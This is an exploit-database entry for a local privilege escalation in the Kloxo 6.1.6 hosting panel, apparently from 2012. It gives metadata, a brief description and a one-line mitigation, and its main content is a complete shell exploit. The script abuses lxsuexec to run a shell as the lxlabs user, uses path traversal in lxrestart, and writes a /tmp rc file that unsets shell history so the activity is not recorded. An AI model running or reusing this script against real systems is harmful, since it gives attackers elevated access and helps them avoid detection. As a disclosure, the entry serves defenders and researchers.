Kloxo Local Privilege Escalation

vendor:

Kloxo

by:

HTP

7,2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Kloxo

Affected Version From: 6.1.6

Affected Version To: 6.1.6

Patch Exists: NO

Related CWE: None

CPE: a:lxcenter:kloxo:6.1.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: CentOS 5

August 2012

Kloxo Local Privilege Escalation

This exploit requires the user to be the Apache user, or another capable of running lxsuexec. The exploit sets the MUID and GID to the LXLABS user, and sets the TARGET to /bin/sh. It then creates a file called w00trc in the /tmp directory, and a file called lol in the /tmp directory. Finally, it runs lxsuexec on the lol file.

Mitigation:

Ensure that the Apache user is not able to run lxsuexec.

Source

Exploit-DB raw data:

#!/bin/sh
# Exploit Title: Kloxo Local Privilege Escalation
# Google Dork: inurl:kiddies
# Date: August 2012 or so
# Exploit Author: HTP
# Vendor Homepage: http://lxcenter.org/
# Software Link: [download link if available]
# Version: 6.1.6 (Latest)
# Tested on: CentOS 5
# CVE : None
# This exploit requires you to be the Apache user, or another capable of running lxsuexec.
LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`
export MUID=$LXLABS
export GID=$LXLABS
export TARGET=/bin/sh
export CHECK_GID=0
export NON_RESIDENT=1
echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc
echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol
lxsuexec /tmp/lol